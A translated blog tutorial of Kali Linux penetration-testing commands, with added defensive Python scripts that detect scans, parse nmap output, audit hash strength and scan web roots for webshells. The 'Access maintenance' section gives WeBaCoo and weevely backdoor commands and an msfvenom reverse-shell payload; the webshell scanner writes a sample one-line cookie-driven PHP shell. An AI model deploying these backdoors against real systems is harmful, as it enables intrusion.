Kali Linux notes and penetration testing guide

Kali Linux introduction and getting started

1. Main features of Kali

Kali official website: https://www.kali.org/
Debian-based Linux distribution

Bundles more than 300 penetration testing tools

Supports most wireless network cards

2. Network service configuration

1. Set a fixed IP:

Virtual machine network settings file

/etc/network/interfaces


2. Temporary IP configuration commands
ifconfig eth0 192.168.43.100 netmask 255.255.255.0					// IP address
route add default gw 192.168.43.1									// default gateway route
systemctl restart networking.service								// restart networking to restore the persistent configuration
3. The role of the dmesg command:

View wireless network card hardware information and the kernel ring buffer messages.

4. Commands to start and stop network services

Either systemctl or service can be used here; the syntax is essentially the same. Older versions of Kali may only support the service command.
Common subcommands:

start			// start
stop			// stop
restart			// restart
5. Commonly used services in Kali

http(apache)

service apache2 start // Start
service apache2 stop // Close
service apache2 restart // Restart
update-rc.d apache2 defaults // Self-start

mysql

service mysql start // Start
service mysql stop // Close
service mysql restart // Restart
update-rc.d mysql defaults // Self-start
mysql -u root -p // Login

ssh

service ssh start // Start
service ssh stop // Close
service ssh restart // Restart
update-rc.d ssh defaults // Self-start


3. System update

Commands:
apt-get update
apt-get upgrade
apt-get dist-upgrade

PS: The latest version of Kali, the 2020 version, is not very compatible, and many of the tools I commonly use have been removed. Personally, I do not recommend updating unless you need to.

apt-cache search <package>			// search the package repository for a package name
apt-get install <package>			// install the specified package

Penetration testing overview

1. Five testing methodology frameworks

Open Source Security Testing Methodology Manual (OSSTMM)

Information Systems Security Assessment Framework (ISSAF)

Open Web Application Security Project (OWASP)

Web Application Security Consortium Threat Classification (WASC-TC)

Penetration Testing Execution Standard (PTES)

2. General penetration testing framework

Scope definition

Information gathering

Target identification

Service enumeration

Vulnerability mapping

Social engineering

Exploitation

Privilege escalation

Access maintenance

Documentation and reporting

Implementation steps of penetration testing

1. Information gathering

Definition and usage of the whois command

whois example.com
This command returns the registration details of the example.com domain, including the registrant and contact information.
Official website: https://who.is/

DNS record analysis
1. host
host www.example.com

With no parameters, only the IP address (IPv4) is returned.

host -a www.example.com

Add the -a parameter to return all DNS records.

2. dig
dig example.com

With no parameters, only the A record (IPv4 address) is returned.

dig example.com any

Add the any parameter to return all DNS records.

3. dnsenum
dnsenum example.com

By default it returns the IP addresses of the host, its name servers and its mail servers.
If you have a wordlist, the tool can also brute-force subdomains:
dnsenum -f dns.txt example.com

4. dmitry
dmitry -iwnse targethost

Perform a whois query

Retrieve host information from the Netcraft.com website

Search for all possible subdomains

Search for all possible email addresses

dmitry targethost -f -b

Perform a simple port scan (very slow and not very useful; not recommended)

Routing information
1. tcptraceroute
tcptraceroute example.com

The target web server is known to have TCP port 80 open; the command above obtains the complete route from the local machine to the target host.

PS: easily blocked by firewalls

2. tctrace
tctrace -i eth0 -d example.com

Use the network interface eth0 to obtain the route between this machine and example.com.

Target identification

(See also the blog column post "Commonly used penetration testing tools: target identification".)

1. ping
ping -c 10 example.com
ping -c 10 192.168.123.256

The -c parameter specifies the number of packets to send (number of executions)

The -I parameter (capital I) specifies the source address or network interface (network card)

The -s parameter specifies the packet size (default 64 bytes)

2. arping
arping 192.168.56.102 -c 1

Check whether a host on the LAN is online; the -i parameter specifies the network interface and -c the number of requests.

3. fping
fping 192.168.1.1 192.168.1.100 192.168.1.107

Check whether the three hosts are online

fping -g 192.168.56.0/24

Probe the entire network segment

fping -r 1 -g 192.168.1.1 192.168.1.10

The -r parameter specifies the number of retries (default 3)

fping -s www.baidu.com www.cqcet.edu.cn www.csdn.net

The -s parameter shows statistics for multiple targets

4. Hping3

Main purposes:

Testing firewall rules

Testing intrusion detection systems (IDS)

Testing for TCP/IP security vulnerabilities

hping3 -0 192.168.56.101  send raw IP packets (--raw-ip)
hping3 -1 192.168.56.101  send ICMP packets (--icmp)
hping3 -2 192.168.56.101  send UDP packets (--udp)
hping3 -8 192.168.56.101  enter scan mode (--scan)
hping3 -9 192.168.56.101  enter listen mode (--listen)
5. nping
nping --tcp-connect -c 1 -p 22 192.168.56.102  basic TCP connect mode
nping --tcp -c 1 -p 22 192.168.6.102           TCP mode
nping --udp -c 1 -p 22 192.168.6.102           UDP mode
nping --icmp -c 1 -p 22 192.168.6.102          ICMP mode (default)
nping --arp -c 1 -p 22 192.168.6.102           ARP/RARP mode
nping --tr -c 1 -p 22 192.168.6.102            traceroute mode
6. nbtscan
nbtscan 192.168.1.1-254

Search the NetBIOS name of each host in the LAN

nbtscan -hv 192.168.1.1-254

The -hv parameters show which services are running

7. uniscan

Operating system identification

1. p0f

It can identify the following hosts:

Machines that connect to your host (SYN mode, the default)

Machines that your host connects to (SYN+ACK mode)

Machines that your host cannot connect to (RST+ mode)

Machines whose network traffic it can observe

p0f -f /etc/p0f/p0f.fp -o p0f.log

Then open port 80 for the target machine to connect to.

2. nmap
nmap -O 192.168.43.89			// operating system detection

The recognition rate is not very high.

Service enumeration

(See also the blog column post "Commonly used penetration testing tools: amap service enumeration".)

Network scanning

1. nmap

Main functions:

Host discovery

Port scanning

Service / version detection

Operating system detection

Network route tracing

Nmap Scripting Engine

Scan types:

nmap -sT 192.168.43.89							// TCP connect scan
nmap -sS 192.168.43.89							// SYN scan
nmap -sN 192.168.43.89 							// TCP NULL scan
nmap -sF 192.168.43.89  						// TCP FIN scan
nmap -sX 192.168.43.89  						// TCP Xmas scan
nmap -sM 192.168.43.89  						// TCP Maimon scan
nmap -sA 192.168.43.89  						// TCP ACK scan
nmap -sW 192.168.43.89  						// TCP window scan
nmap -sI 192.168.43.89  						// TCP idle scan

Target port options:

-p <port range>        scan only the specified ports
-F (fast scan)         scan only the 100 most common ports
-r (sequential scan)   scan ports in ascending order instead of random order
--top-ports <N>        scan the N highest-ranked ports in nmap-services

Output options:

Interactive (screen) output
Normal output (-oN): like the screen output, but without runtime information and warnings
XML output (-oX): the generated XML file can be converted to HTML, parsed by graphical front ends, and easily imported into a database
Grepable output (-oG): generates files that are easy to process with grep

Timing control options:

-T <0-5>   specifies the timing template that controls scan speed

Common options:

nmap -sV 192.168.43.89 -p 22    				// service version detection
nmap -O  192.168.43.89          				// operating system detection
nmap -Pn 192.168.43.89          				// disable host discovery (treat the target as up)
nmap -A  192.168.43.89          				// comprehensive scan

Script engine:

-sC or --script=default                         run the default category of NSE scripts
--script <filename>|<category>|<directories>    run the scripts matching the given file, category or directory names
--script-args <args>                            pass arguments to the scripts

Firewall/IDS evasion options:

-f                               use small (fragmented) packets
--mtu <size>                     adjust the packet size
-D <decoys>                      specify fake (decoy) IP addresses
--source-port <portnumber> or -g spoof the source port
--data-length <num>              change the default length of the packets sent
--max-parallelism <num>          limit the maximum number of concurrent probes
--scan-delay <time>              control the interval between probes

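Defenders see the host-discovery tools above (ping, arping, fping, nmap -sn) and the scan types just listed from the other side: as a burst of ICMP echo requests to many addresses, or as SYN segments to many ports of one host, both of which show up in firewall logs. The script below is an added example, not code from the original post or from any tool it names. It assumes a netfilter LOG rule (for example `iptables -A INPUT -j LOG --log-prefix "FW: "`) writing syslog lines in the kernel's key=value format, and every sample line is constructed.

```python
"""Flag ICMP host sweeps and TCP SYN port scans in netfilter LOG lines.

Added example for this guide, not code from the original post. Assumes the
kernel LOG target format (IN= OUT= SRC= DST= PROTO= ... key=value fields,
with TCP flags printed as bare tokens). Every sample line is constructed.
"""
from collections import defaultdict

# TCP flags are printed by the LOG target as bare upper-case tokens.
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}

# Constructed sample: an echo sweep from .10, a port scan from .20,
# ordinary HTTPS traffic from .30 and one unrelated sshd line.
SAMPLE_LOG = (
    [f"Mar 10 12:00:01 gw kernel: FW: IN=eth0 OUT= SRC=192.168.56.10 "
     f"DST=192.168.56.{i} LEN=84 PROTO=ICMP TYPE=8 CODE=0" for i in range(1, 7)]
    + [f"Mar 10 12:00:05 gw kernel: FW: IN=eth0 OUT= SRC=192.168.56.20 "
       f"DST=192.168.56.102 PROTO=TCP SPT=40001 DPT={p} WINDOW=1024 RES=0x00 SYN URGP=0"
       for p in (21, 22, 23, 25, 80, 443, 8080)]
    + ["Mar 10 12:00:06 gw kernel: FW: IN=eth0 OUT= SRC=192.168.56.102 "
       "DST=192.168.56.20 PROTO=TCP SPT=22 DPT=40001 WINDOW=29200 RES=0x00 ACK SYN URGP=0",
       "Mar 10 12:00:07 gw kernel: FW: IN=eth0 OUT= SRC=192.168.56.30 "
       "DST=192.168.56.102 PROTO=TCP SPT=50000 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0",
       "Mar 10 12:00:08 gw kernel: FW: IN=eth0 OUT= SRC=192.168.56.30 "
       "DST=192.168.56.102 PROTO=TCP SPT=50001 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0",
       "Mar 10 12:00:09 gw sshd[1234]: Accepted publickey for admin from 192.168.56.30"]
)


def parse_log_line(line):
    """Split one LOG line into key=value fields plus a FLAGS set of TCP flags.

    Returns None for lines without a SRC= field (anything that is not a
    firewall log entry).
    """
    fields, flags = {}, set()
    for token in line.split():
        if "=" in token:
            key, _, value = token.partition("=")
            fields[key] = value
        elif token in TCP_FLAGS:
            flags.add(token)
    if "SRC" not in fields:
        return None
    fields["FLAGS"] = flags
    return fields


def detect_sweeps_and_scans(lines, min_hosts=5, min_ports=5):
    """Aggregate per-source activity and report likely sweeps and scans.

    icmp_sweeps: one SRC sent echo requests (ICMP TYPE=8) to >= min_hosts
                 distinct DSTs, the footprint of fping -g or a ping sweep.
    syn_scans:   one SRC sent SYN-only segments to >= min_ports distinct
                 DPTs on one DST, the footprint of a SYN or connect scan.
    SYN+ACK replies are ignored so the scanned host is not itself flagged.
    """
    icmp_targets = defaultdict(set)   # src -> {dst}
    syn_ports = defaultdict(set)      # (src, dst) -> {dpt}
    for line in lines:
        f = parse_log_line(line)
        if f is None:
            continue
        if f.get("PROTO") == "ICMP" and f.get("TYPE") == "8":
            icmp_targets[f["SRC"]].add(f.get("DST"))
        elif f.get("PROTO") == "TCP" and f["FLAGS"] == {"SYN"}:
            syn_ports[(f["SRC"], f.get("DST"))].add(f.get("DPT"))
    sweeps = sorted((src, len(dsts)) for src, dsts in icmp_targets.items()
                    if len(dsts) >= min_hosts)
    scans = sorted((src, dst, len(ports)) for (src, dst), ports in syn_ports.items()
                   if len(ports) >= min_ports)
    return {"icmp_sweeps": sweeps, "syn_scans": scans}


if __name__ == "__main__":
    result = detect_sweeps_and_scans(SAMPLE_LOG)
    for src, n in result["icmp_sweeps"]:
        print(f"ICMP sweep from {src}: {n} hosts probed")
    for src, dst, n in result["syn_scans"]:
        print(f"SYN scan from {src} against {dst}: {n} ports probed")
```

The thresholds are low to suit the sample; on a real gateway raise min_hosts and min_ports and bucket the counts by time window, so that a monitoring system that legitimately polls many hosts is not reported. Stealthier scan types (NULL, FIN, Xmas) carry different flag sets and would need their own branch.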

2. Unicornscan

-m U detect UDP protocol
-m T detect TCP protocol

-Iv View detailed output

-r Adjust the packet sending rate

unicornscan -m U -Iv 192.168.43.89:1-65535 -r 10000
unicornscan -m T -Iv 192.168.43.89:1-65535 -r 10000

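The grepable (-oG) format listed under the nmap output options above is the one a defender reaches for after an authorised scan of their own network, because the point is to compare what is exposed against what should be. The parser below is an added example, not code from the original post or from nmap. It assumes the tab-separated Host: / Ports: / Ignored State: layout with port/state/proto/owner/service/rpc/version/ entries; the scan output, host addresses and allow-list are constructed.

```python
"""Parse nmap grepable (-oG) output and compare exposed ports with an allow-list.

Added example for this guide, not code from the original post or from nmap.
Assumes the -oG line layout: tab-separated 'Host:' / 'Ports:' / 'Ignored State:'
sections, each port entry being port/state/proto/owner/service/rpc/version/.
The scan output, hosts and allow-list below are constructed.
"""

# Constructed -oG output for two hosts (not a real scan).
SAMPLE_GNMAP = """\
# Nmap scan (constructed sample) as: nmap -sV -oG - 192.168.43.0/24
Host: 192.168.43.89 ()\tStatus: Up
Host: 192.168.43.89 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10/, 80/open/tcp//http//Apache httpd 2.4.38/, 3306/open/tcp//mysql//MariaDB/\tIgnored State: closed (997)
Host: 192.168.43.90 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10/, 25/filtered/tcp//smtp///\tIgnored State: closed (998)
# Nmap done (constructed sample)
"""

# What each host is supposed to expose (constructed allow-list).
ALLOWED_PORTS = {
    "192.168.43.89": {(22, "tcp"), (80, "tcp")},
    "192.168.43.90": {(22, "tcp")},
}


def parse_gnmap(text):
    """Return {ip: {(port, proto): (state, service, version)}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        sections = line.split("\t")
        ip = sections[0].split()[1]
        entry = hosts.setdefault(ip, {})
        for section in sections[1:]:
            if not section.startswith("Ports:"):
                continue
            for item in section[len("Ports:"):].split(","):
                fields = item.strip().split("/")
                if len(fields) < 7:
                    continue          # malformed entry; skip rather than guess
                port, state, proto, _owner, service, _rpc, version = fields[:7]
                entry[(int(port), proto)] = (state, service, version)
    return hosts


def unexpected_open_ports(hosts, allowed):
    """List (ip, port, proto, service, version) for open ports outside the allow-list.

    Hosts absent from the allow-list have every open port reported.
    """
    findings = []
    for ip, ports in sorted(hosts.items()):
        permitted = allowed.get(ip, set())
        for (port, proto), (state, service, version) in sorted(ports.items()):
            if state == "open" and (port, proto) not in permitted:
                findings.append((ip, port, proto, service, version))
    return findings


if __name__ == "__main__":
    inventory = parse_gnmap(SAMPLE_GNMAP)
    for ip, port, proto, service, version in unexpected_open_ports(inventory, ALLOWED_PORTS):
        print(f"{ip} exposes {port}/{proto} ({service} {version}) outside the allow-list")
```

Feed it a real file with `parse_gnmap(open("scan.gnmap").read())`; the same comparison run on two scans taken weeks apart gives a plain diff of what was opened in between.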

SMB enumeration

1. nbtscan
nbtscan 192.168.56.1-254

Search the NetBIOS name of each host in the 192.168.56.0 network

nbtscan -hv 192.168.56.102

View the network services of the host 192.168.56.102

SNMP enumeration

(See also the blog column post "Commonly used penetration testing tools: ADMsnmp for SNMP analysis".)

1. onesixtyone
onesixtyone 192.168.56.102

Search for the SNMP community strings accepted by the host

onesixtyone -d 192.168.56.102

Perform a more detailed scan

2. snmpcheck
snmpcheck -t 192.168.56.102

Collect information about SNMP devices

VPN enumeration

1. ike-scan
ike-scan -M -A -Pike-hashkey 192.168.0.10

Detect, fingerprint and test an IPsec VPN server

-M splits the decoded payload information into multiple lines for easier reading

-A uses IKE aggressive mode

-P saves the aggressive-mode hash and shared-key data to a file

Vulnerability mapping

1. Types of vulnerabilities

Local vulnerability

Remote vulnerability

2. Vulnerability scanners

OpenVAS

Cisco analysis tools

Cisco Auditing Tool(cat)

Run:

 cd /usr/share/
 CAT --help

Options:
-h specifies the host name (use this option when scanning a single host)
-w specifies the wordlist (to guess the community string)
-a specifies the password list (to brute-force the password)
-i [ioshist] (check for historically known IOS bugs)

Cisco Global Exploiter (cge)

Run:

 cd /usr/bin/
 cge.pl

Command:

cge.pl 10.200.213.25 3

3. Testing tools

WebCrack

Fuzz analysis tools

BED (to be continued)

JBroFuzz (to be continued)

3. SMB analysis tools

ImpacketSamrdump

(to be continued)

4. SNMP analysis tools

SNMP Walk

(to be continued)

5. Web application analysis tools

Database assessment tools

DBPwAudit (to be continued)

sqlmap

SQL Ninja (to be continued)

Web application assessment tools

Burpsuite (to be continued)

nobody

Paros Proxy (to be continued)

W3af (to be continued)

WafW00f (to be continued)

Webscarab (to be continued)

Exploit

MSFConsole
MSFConsole: commonly used modules
MSFConsole: post-exploitation modules

Privilege escalation

1. Classification

Vertical privilege escalation

Horizontal privilege escalation

2. Exploiting local vulnerabilities

3. Password attacks

Knowledge-based
Possession-based
Biometric (feature-based)
Offline attacks
Online attacks

hash-identifier: determines the hash algorithm, so that only the algorithm actually used by the system under test is attacked when cracking passwords

Hashcat: multi-threaded password cracking that makes full use of the CPU

RainbowCrack: cracks hashes with rainbow tables, trading space for time

samdump2: cracks Windows system account passwords

John the Ripper: hash cracking; particularly good at DES crypt hashes

Johnny: graphical front end for John

Crunch: builds password dictionaries for brute-force attacks

Ophcrack: rainbow-table cracking of LM / NTLM hashes

Online cracking tools

CeWL: crawls a specified URL and collects the words found there into a dictionary, improving the hit rate of brute forcing

Hydra: online password cracking

Medusa: online password cracking
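
hash-identifier works by pattern-matching the hash string, and the same matching lets a defender audit their own credential store for the fast, unsalted formats that Hashcat, John and Ophcrack crack quickly. The script below is an added example, not the original post's or hash-identifier's code; its signature list is written for this example, and the credential lines, salts and digests are constructed placeholders rather than hashes of real passwords (the 32-hex value is the well-known MD5 of the empty string).

```python
"""Identify password-hash formats and audit a credential store for weak ones.

Added example for this guide, not code from the original post or from
hash-identifier. The signature list is this example's own; matching is
pattern-based, so raw hex digests of equal length report every candidate.
"""
import re

# (name, pattern, fast): fast marks unsalted or cheap digests that Hashcat,
# John and rainbow tables crack at very high rates.
SIGNATURES = [
    ("md5crypt ($1$)",
     re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$"), False),
    ("bcrypt ($2a$/$2b$/$2y$)",
     re.compile(r"^\$2[aby]\$\d{2}\$[./0-9A-Za-z]{53}$"), False),
    ("sha256crypt ($5$)",
     re.compile(r"^\$5\$(rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{43}$"), False),
    ("sha512crypt ($6$)",
     re.compile(r"^\$6\$(rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}$"), False),
    ("DES crypt (13 chars)", re.compile(r"^[./0-9A-Za-z]{13}$"), True),
    ("MD5 / NTLM / LM (32 hex)", re.compile(r"^[0-9a-fA-F]{32}$"), True),
    ("SHA-1 (40 hex)", re.compile(r"^[0-9a-fA-F]{40}$"), True),
    ("SHA-256 (64 hex)", re.compile(r"^[0-9a-fA-F]{64}$"), True),
    ("SHA-512 (128 hex)", re.compile(r"^[0-9a-fA-F]{128}$"), True),
]

# Constructed sample export (shadow-style user:hash:... lines). Salts and
# digests are placeholders, not hashes of real passwords; the 32-hex value
# is the well-known MD5 of the empty string.
SAMPLE_CREDENTIALS = [
    "# user:hash:lastchg:min:max:warn:inactive:expire:",
    "root:$6$saltsalt$" + "A" * 86 + ":18000:0:99999:7:::",
    "alice:$2b$12$" + "B" * 53 + ":18000:0:99999:7:::",
    "svc_backup:d41d8cd98f00b204e9800998ecf8427e:18000:0:99999:7:::",
    "legacy:AbCdEfGhIjKlM:18000:0:99999:7:::",
    "daemon:*:18000:0:99999:7:::",
]


def identify_hash(value):
    """Return the names of every signature the hash string matches."""
    value = value.strip()
    return [name for name, pattern, _ in SIGNATURES if pattern.match(value)]


def is_fast_hash(value):
    """True when the string matches at least one signature and all matches are fast."""
    matches = [fast for _, pattern, fast in SIGNATURES if pattern.match(value.strip())]
    return bool(matches) and all(matches)


def audit_credentials(lines):
    """Classify each user's hash; returns (user, algorithm or 'unknown', weak).

    Comments, blank lines and locked or empty password fields ('*', '!', '')
    are skipped.
    """
    report = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        user, _, rest = line.partition(":")
        hashed = rest.split(":")[0]
        if hashed in ("", "*") or hashed.startswith("!"):
            continue
        names = identify_hash(hashed)
        report.append((user, names[0] if names else "unknown", is_fast_hash(hashed)))
    return report


if __name__ == "__main__":
    for user, algo, weak in audit_credentials(SAMPLE_CREDENTIALS):
        print(f"{user:12s} {algo:28s} {'WEAK: migrate to a slow hash' if weak else 'ok'}")
```

Run it over a copy of /etc/shadow or an application's user table export; any account reported as weak is the one to migrate to bcrypt or sha512crypt with a high round count before an offline attack with the tools above becomes cheap.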

4. Network spoofing tools

Network sniffing and spoofing

DNSchef

Acts as the DNS server for the host under test and resolves domain names to an attacker-controlled IP, so that the attacker's host takes the role of the real server

arpspoof

Utility for assisting network monitoring on switched networks

Ettercap

Tool for man-in-the-middle attacks on a LAN

5. Network sniffers

Dsniff

tcpdump

Wireshark

Access maintenance

1. Operating system backdoors

Cymothoa

Intersect

Meterpreter

2. Tunnelling tools

dns2tcp
iodine
ncat
proxychains
ptunnel
shocked
sslh
stunnel4

3. Web backdoors

WeBaCoo

Options:
-g generate backdoor code
-f PHP function used by the backdoor: system (default) / shell_exec / exec / passthru / popen
-o output file name for the generated backdoor
Example:

webacoo -g -o test.php  generate a PHP backdoor with the default configuration
webacoo -t -u http://192.168.43.89/test.php

Connect to the backdoor

weevely

Generate an obfuscated PHP backdoor and save it as display.php

weevely generate password display.php
weevely http://192.168.43.89/display.php password

Access the webshell on the host under test

PHP Meterpreter

-p specifies the payload: php/meterpreter/reverse_tcp

-f sets the output format

LHOST is the attacker's address
LPORT is the attacker's port

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.180 LPORT=1234 -f raw > a.php

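Each of the three generators above drops a single PHP file whose body calls an execution function on data taken from the request, often wrapped in base64. That combination is what a defender looks for when sweeping a web root for planted files. The scanner below is an added example, not code from the original post or from WeBaCoo, weevely or msfvenom; the indicator lists are this example's own, and the sample files it writes to a temporary directory are constructed.

```python
"""Scan a web root for PHP files that look like single-file backdoors.

Added example for this guide, not code from the original post or from
WeBaCoo, weevely or msfvenom. Each PHP file is scored on three indicator
groups: execution/evaluation functions, request data from superglobals, and
obfuscation helpers. The sample files written below are constructed.
"""
import os
import re
import tempfile

EXEC_FUNCS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I)
INPUT_VARS = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
OBFUSCATION = re.compile(
    r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)
LONG_BLOB = re.compile(r"[A-Za-z0-9+/=]{120,}")   # long base64-looking literal
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")


def score_php_source(src):
    """Return (score, indicators) for one file's source text.

    Execution functions alone are common in legitimate code; the score jumps
    when they are combined with raw request input, which is how the one-file
    backdoors described above are built.
    """
    indicators = []
    if EXEC_FUNCS.search(src):
        indicators.append("exec-function")
    if INPUT_VARS.search(src):
        indicators.append("request-input")
    if OBFUSCATION.search(src):
        indicators.append("obfuscation")
    if LONG_BLOB.search(src):
        indicators.append("long-blob")
    bonus = 2 if "exec-function" in indicators and "request-input" in indicators else 0
    return len(indicators) + bonus, indicators


def scan_webroot(root, threshold=3):
    """Walk root and return sorted [(relative_path, score, indicators)] at/above threshold."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                score, indicators = score_php_source(fh.read())
            if score >= threshold:
                hits.append((os.path.relpath(path, root), score, indicators))
    return sorted(hits)


# Constructed sample files: an ordinary page, a cookie-driven shell hidden in
# an upload directory, and a non-PHP file that must be ignored.
SAMPLE_FILES = {
    "index.php": "<?php\n$title = htmlspecialchars($_GET['t'] ?? 'home');\n"
                 "echo \"<h1>$title</h1>\";\n",
    "uploads/.cache.php": "<?php @system(base64_decode($_COOKIE['cm'])); ?>",
    "static/readme.txt": "not php at all",
}


def write_sample_webroot():
    """Create the constructed sample tree in a temporary directory; return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, score, indicators in scan_webroot(write_sample_webroot()):
        print(f"{score:2d}  {rel}  {','.join(indicators)}")
```

Point it at a real document root with `scan_webroot("/var/www/html")` and treat the score as triage rather than proof: legitimate admin panels also call system() on request data, so compare modification times, ownership and the deployment manifest before removing anything.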

Source: blog.csdn.net/qq_38626043/article/details/105366375